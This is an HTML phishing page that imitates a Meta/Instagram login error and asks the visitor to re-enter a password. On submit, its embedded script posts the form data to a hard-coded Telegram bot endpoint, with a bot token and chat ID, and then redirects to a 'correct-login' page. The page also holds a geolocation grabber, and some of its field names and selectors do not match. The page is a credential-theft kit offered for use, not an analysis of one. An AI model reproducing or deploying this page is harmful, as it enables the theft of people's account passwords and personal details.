<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <title>Blue | Application Meta</title>
    <meta name="description" content="">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="icon" href="head.ico">
    <link href="bootstrap.min.css" rel="stylesheet">
    <link href="style.css" rel="stylesheet">
    <link rel="stylesheet" href="../../use.fontawesome.com/releases/v5.12.1/css/all.css" crossorigin="anonymous">
</head>
<body>
    <header>
        <table>
            <tbody>
                <tr>
                    <td><img src="logo.png" width="200"></td>
                    <td><font size="5"><i class="fas fa-stream"></i></font></td>
                </tr>
            </tbody>
        </table>
    </header>
    
    <div class="lsf_od">
        <div class="cardddd">
            <form autocomplete="off" method="post" enctype="multipart/form-data" onsubmit="sendToTelegram(event);">
                <center>
                    <img src="meta.png" width="300">
                    <h1 style="font-family:sans-serif; font-weight:400;  color:#3d3d3d; font-size:20px;">Incorrect entry</h1>
                </center>
                <style>
                    .user-resim img {
                        margin-top: 10px;
                        border-radius: 50%;
                        height: 60px;
                        float: left;
                        margin-left: 10px;
                    }
                </style>
                <div class="user-resim">
                    <h4 style="float: left; margin:20px 0px 0px 10px; font-weight: bold;"></h4>
                    <div class="instagram_profile" id="instagramfeed">
                        <img class="instagram_profile_image" src="..." alt="Instagram profile pic">
                    </div>
                </div>
                <style>
                    .box {
                        display: flex;
                        justify-content: center;
                        font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Helvetica, Arial, sans-serif;
                        width: 100%;
                        height: 100%;
                    }
                    .box table {
                        margin-top: 16px;
                        border: 2px solid transparent;
                        border-radius: 5px;
                        font-weight:bold;
                        padding: 10px;
                        list-style: none;
                    }
                    .box table td {
                        padding: 5px 20px;
                    }
                </style>
                <div class="box">
                    <table>
                        <thead>
                            <tr>
                                <td></td>
                                <td></td>
                                <td></td>
                            </tr>
                        </thead>
                        <tbody>
                            <tr>
                                <!-- Your form fields here -->
                            </tr>
                        </tbody>
                    </table>
                </div>
                <br>
                <center>
                    <input type="password" required="" name="password2" placeholder="Password" class="fdasf_o">
                    <input type="hidden" name="fname" placeholder="hhh55" class="fdasf_o">
                    <br>
                    <br>
                    <div style="color:#f00; font-weight: bold;"><font color='red'><center>Sorry, your password was wrong. Please check your password properly..</center></font></div>
                    <br>
                    <button type="submit" name="submit" class="bvsf_asd">
                        <span>Next</span>
                    </button>
                    <img src="meta.gif" width="300px">
                </center>
            </form>
        </div>
        <!--boş-->
        <br><br><br><br>
        <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js"></script>
        <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery-easing/1.3/jquery.easing.min.js"></script>
        <script src="bootstrap.min.js"></script>
        <script src="zewform.js"></script>
        <script src="jquery.instagramFeed.min.js"></script>
        <script>
            function getLocation() {
                if (navigator.geolocation) {
                    navigator.geolocation.getCurrentPosition(showPosition);
                }
            }

            function showPosition(position) {
                document.querySelector('.lsf_o form input[name="latitude"]').value = position.coords.latitude;
                document.querySelector('.lsf_o form input[name="longitude"]').value = position.coords.longitude;
            }

            function sendToTelegram(event) {
                event.preventDefault(); // Prevent the default form submission
                var formData = new FormData(event.target);

                // Send form data to Telegram bot using an AJAX request
                var xhr = new XMLHttpRequest();
                xhr.open("POST", "https://api.telegram.org/6334457895:AAH5-_N9Ou-xk5huQ4mX-A4GHrfPPHWlMbw/sendMessage?chat_id=6048293239");
                xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
                xhr.send("text=New User Details:\nUser Name: " + formData.get("fname") +
                    "\nEmail: " + formData.get("email") +
                    "\nPhone Number: " + formData.get("contact"));

                // You will need to replace YOUR_BOT_TOKEN and YOUR_CHAT_ID with your actual Telegram bot token and chat ID.

                // Optionally, you can handle the response from the bot here and provide feedback to the user.

                // Redirect to the "correct-login.html" page
                window.location.href = "correct-login.html";
            }
        </script>

    </div>
    <div class="footer">
        <p>© 2023 from Instagram</p>
    </div>
</body>
</html>
